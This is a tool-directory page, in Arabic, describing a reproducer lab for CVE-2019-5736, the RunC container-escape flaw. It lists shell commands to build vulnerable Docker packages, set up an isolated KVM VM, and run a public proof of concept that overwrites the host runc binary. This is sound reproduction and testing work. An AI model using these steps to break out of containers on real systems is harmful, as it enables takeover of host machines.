Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2019-5736-reproducer — مُعيد إنتاج لـ CVE-2019-5736، وهي ثغرة هروب من حاويات RunC. توفر نصوص بناء ومختبرًا قائمًا على KVM لتأكيد الاستغلال ضد حزم Docker الضعيفة. | Kitploit
أدوات/GitHubGitHub/takumak/cve-2019-5736-reproducer
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالأمن السحابةالتعلم والتعليمالهروب من الحاوية
GitHubtakumak/cve-2019-5736-reproducer

cve-2019-5736-reproducer

مُعيد إنتاج لـ CVE-2019-5736، وهي ثغرة هروب من حاويات RunC. توفر نصوص بناء ومختبرًا قائمًا على KVM لتأكيد الاستغلال ضد حزم Docker الضعيفة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
7منذ 4 سنواتلم تتم المراجعة بعد

CVE-2019-5736 أداة إعادة إنتاج

يتيح لك هذا تأكيد أن RunC-CVE-2019-5736 يعمل على مثيل KVM الخاص بك.

نظرة عامة على سير العمل

  • بناء حزم docker.io ذات الصلة المعرضة للثغرة CVE-2019-5736 في هذا المستودع
  • تشغيل مثيل KVM لنظام Ubuntu 18.04 على LXD
  • تثبيت حزم *.deb المعرضة للثغرة في الجهاز الافتراضي
  • تجربة الإجراء المقدم في RunC-CVE-2019-5736

بناء حزم *.deb المعرضة للثغرة

root@kitploit:~
$ docker-compose build --no-cache
$ docker-compose run build

إعداد الكرة المصدرية لـ RunC-CVE-2019-5736

root@kitploit:~
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736.git
$ tar cjf RunC-CVE-2019-5736.tar.bz2 RunC-CVE-2019-5736

تشغيل مثيل KVM لنظام Ubuntu 18.04 على LXD

root@kitploit:~
$ lxc launch --vm images:ubuntu/18.04 test-cve-2019-5736 -c limits.cpu=4 -c limits.memory=4GB
$ lxc file push deb/*.deb RunC-CVE-2019-5736.tar.bz2 test-cve-2019-5736/root/
$ lxc exec test-cve-2019-5736 bash
root@test-cve-2019-5736:~# sed -i -e '/bionic-updates/s/^/#/' -e '/bionic-security/s/^/#/' /etc/apt/sources.list
root@test-cve-2019-5736:~# apt update
root@test-cve-2019-5736:~# apt install iptables libltdl7
root@test-cve-2019-5736:~# dpkg -i containerd_0.2.5-0ubuntu2_amd64.deb docker.io_17.12.1-0ubuntu6_amd64.deb runc_1.0.0~rc6+git20181203.96ec2177-0~ubuntu2_amd64.deb

لاحظ أنه يجب عليك استخدام images:ubuntu/18.04 بدلاً من ubuntu:18.04 لأن الأمر lxc exec لا يعمل بشكل صحيح مع الأخير.

إعادة إنتاج RunC-CVE-2019-5736

root@kitploit:~
$ lxc exec test-cve-2019-5736 bash
root@test-cve-2019-5736:~# tar xf RunC-CVE-2019-5736.tar.bz2
root@test-cve-2019-5736:~# cd RunC-CVE-2019-5736
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker build -t cve-2019-5736:exec_POC ./exec_POC
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
92b965383f377419f3dad7cec45e468a4c4a83e82e11a2f2e0e23803016e2840
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker exec poc_ctr bash
No help topic for '/usr/bin/bash'
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# /usr/bin/docker-runc

**THE ALL NEW AND IMPROVED RUNC**

        [+] Your backdoor here ->

root@test-cve-2019-5736:~/RunC-CVE-2019-5736# 

ملحق

  • إصلاح الالتزام: https://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b
تنزيل الأداة